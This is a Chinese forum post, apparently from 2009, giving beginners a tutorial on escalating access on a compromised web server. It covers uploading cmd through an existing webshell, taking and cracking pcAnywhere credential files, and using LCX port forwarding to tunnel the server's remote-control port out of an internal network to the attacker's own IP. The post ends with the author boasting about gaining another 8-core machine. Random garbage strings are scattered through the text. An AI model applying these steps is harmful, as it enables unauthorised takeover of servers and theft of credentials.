|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
7 G ]4 v$ J( n1 J% ~8 L* K+ z# F1 G4 x$ {7 E
提权方法:pcanywhere+LCX7 Y, I/ |/ N5 M; y1 \4 P
0 q9 l4 c4 d2 Z4 m7 X! `
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。* m% ^/ n' o" \0 i+ z
R8 m1 {. _0 O/ R: {. B' ]% I
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。# r) Q; U' }, P" R
# l. S$ l O# f) A: I i
. W( b4 N; u6 I: a! a. e查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
% I; V( o- C8 l- @4 N0 N1 t1 `( d; Q* {5 H8 n
7 s n4 D L2 F3 m, Z9 C \# Z呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
% j9 E; Q- b$ x8 V" f2 K# g' |: F: v# u& U# J; ^% v& v1 ~3 B! M
1 @( j( F! F' x8 a
9 D+ ^/ v# k$ v8 H& S( I; r' l% e
; {+ n+ x% o" g" [' {& l由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``) r$ C4 d# ^; v, m* w
' B6 m3 R6 t/ E& f0 {2 j+ x2 O+ w/ f
LCX的用法再简单说下:
) V" F' j+ D3 k5 Z2 w) p, D/ r+ ?5 p6 f6 c) E6 Y. ~
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)' s" o; q( z. ^$ _0 S
) ~' R* w4 F9 t% k' f, H本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)* S( ? A4 c* i. Z. c( Z
: V3 J2 {( Z- N# w5 E: }/ y
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
% J/ {' x% U" X. X顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
* }! V3 s9 i- Z5 n! C8 w8 y; b, M: T
* q; e6 E) R# u E& \" f6 }8 p; W
- y, n& @6 E* _# X7 w& T, V8 J. Z
6 G% ~% A6 I2 O5 l7 g* z呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
2 I6 @2 I% {3 M+ H m( V, t; E; G1 _
* F+ Z$ G+ A& @4 z- M
5 p6 Y7 X0 W* `3 F1 Q9 }7 X1 Q
`; n" u) Q: Y) E我们本地连接试试,输入我们刚破解的账号密码
% Y8 W8 n7 [" }! w O, S5 l# h2 z7 o S
- z6 k# T7 k2 b N# t呵呵``连接成功,服务器不错,又一个8核^︵^( G2 r* e8 \; H1 G4 c8 V
- k$ P9 n$ ~8 Z5 \& n! @/ ?
j4 `- u2 ^$ v: P' a8 s& [* t, r3 I8 a l; S1 Y& ?( `
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
